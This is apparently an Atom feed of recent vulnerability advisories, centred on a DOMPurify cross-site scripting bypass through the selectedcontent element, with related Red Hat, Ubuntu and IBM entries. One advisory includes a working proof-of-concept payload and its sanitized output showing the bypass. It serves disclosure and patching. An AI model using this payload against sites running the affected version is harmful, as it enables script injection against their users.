<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-03T11:08:02.658854+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-338257</id>
    <title>EUVD-2026-338257</title>
    <updated>2026-10-03T11:08:02.740248+00:00</updated>
    <content>EUVD-2026-338257</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-338257"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-47423</id>
    <title>fkie_cve-2026-47423</title>
    <updated>2026-10-03T11:08:02.740305+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. In 3.4.4, DOMPurify allowed selectedcontent by default, allowing browsers to re-clone an XSS payload after sanitization so that unsanitized markup inside &lt;selectedcontent&gt; is returned. This issue is fixed in version 3.4.5.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-47423"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-87xg-pxx2-7hvx</id>
    <title>GHSA-87xg-pxx2-7hvx — DOMPurify XSS via selectedcontent re-clone</title>
    <updated>2026-10-03T11:08:02.740359+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: dompurify</p>
<p>### Summary
DOMPurify 3.4.4 allows `selectedcontent` by default, allowing a chain in which browsers "re-clone" an XSS payload after sanitization, effectively bypassing DOMPurify.</p>
<p>### Details
The chain is as follows:
1. The browser parses the input and creates a `&lt;selectedcontent&gt;` clone from the selected `&lt;option&gt;`
2. DOMPurify walks and sanitizes that generated clone.
3. DOMPurify reaches the original `&lt;option&gt;` and removes `selected=javascript:1`
4. The browser refreshes the `&lt;selectedcontent&gt;` clone from the original `option`'s content.
5. The refreshed clone is in a subtree DOMPurify already walked, which DOMPurify doesn't go back to sanitize
6. The returned string contains unsanitized markup inside `&lt;selectedcontent&gt;`.</p>
<p>### PoC
```js
const dirty =
  '&lt;select&gt;&lt;button&gt;&lt;selectedcontent&gt;&lt;/selectedcontent&gt;&lt;/button&gt;' +
  '&lt;option selected=javascript:1&gt;' +
  '&lt;img src=x onerror=alert(1)&gt;x' +
  '&lt;/option&gt;&lt;/select&gt;';</p>
<p>const clean = DOMPurify.sanitize(dirty);
console.log(clean);</p>
<p>document.body.innerHTML = clean;
```</p>
<p>Observed "sanitized" output in Chromium 148/WebKit 625:
```html
&lt;select&gt;&lt;button&gt;&lt;selectedcontent&gt;&lt;img src="x" onerror="alert(1)"&gt;x&lt;/selectedcontent&gt;&lt;/button&gt;&lt;option&gt;&lt;img src="x"&gt;x&lt;/option&gt;&lt;/select&gt;
```</p>
<p>After reinsertion, the browser updates the live DOM and strips the handler from the displayed clone, but the `onerror` has already fired:
```html
&lt;select&gt;&lt;button&gt;&lt;selectedcontent&gt;&lt;img src="x"&gt;x&lt;/selectedcontent&gt;&lt;/button&gt;&lt;option&gt;&lt;img src="x"&gt;x&lt;/option&gt;&lt;/select&gt;
```…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-87xg-pxx2-7hvx"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/rhsa-2026:10999</id>
    <title>RHSA-2026:10999 — Red Hat Security Advisory: Red Hat Hardened Images RPMs bug fix and enhancement update</title>
    <updated>2026-10-03T11:08:02.740440+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>nix: coroutine stack-to-heap overflow via unbounded recursion in NAR directory parser nix: absolute path traversal when unpacking archives to disk dompurify: DOMPurify: Cross-site scripting vulnerability allows information disclosure</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/rhsa-2026:10999"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-47423</id>
    <title>UBUNTU-CVE-2026-47423</title>
    <updated>2026-10-03T11:08:02.740482+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Ubuntu:16.04:LTS: dompurify.js, Ubuntu:18.04:LTS: dompurify.js, Ubuntu:22.04:LTS: node-dompurify, Ubuntu:24.04:LTS: node-dompurify, Ubuntu:26.04:LTS: node-dompurify</p>
<p>DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. In 3.4.4, DOMPurify allowed selectedcontent by default, allowing browsers to re-clone an XSS payload after sanitization so that unsanitized markup inside &lt;selectedcontent&gt; is returned. This issue is fixed in version 3.4.5.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-47423"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2910</id>
    <title>WID-SEC-W-2026-2910 — IBM App Connect Enterprise: Schwachstelle ermöglicht Cross-Site Scripting</title>
    <updated>2026-10-03T11:08:02.740532+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Ein entfernter, anonymer Angreifer kann eine Schwachstelle in IBM App Connect Enterprise ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2910"/>
  </entry>
</feed>
